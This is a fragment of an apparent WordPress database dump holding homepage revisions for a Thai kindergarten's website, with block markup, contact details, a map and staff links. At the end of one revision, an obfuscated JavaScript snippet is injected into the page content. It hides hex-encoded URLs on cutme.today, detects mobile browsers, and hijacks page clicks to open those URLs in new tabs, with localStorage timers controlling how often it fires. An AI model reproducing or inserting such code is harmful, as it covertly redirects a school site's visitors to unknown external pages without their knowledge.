-->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 14:46:31','2025-07-15 07:46:31','',19,'http://watprato.ssk.in.th/?p=690',0,'revision','',0),
(691,1,'2025-07-15 14:55:43','2025-07-15 07:55:43','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" 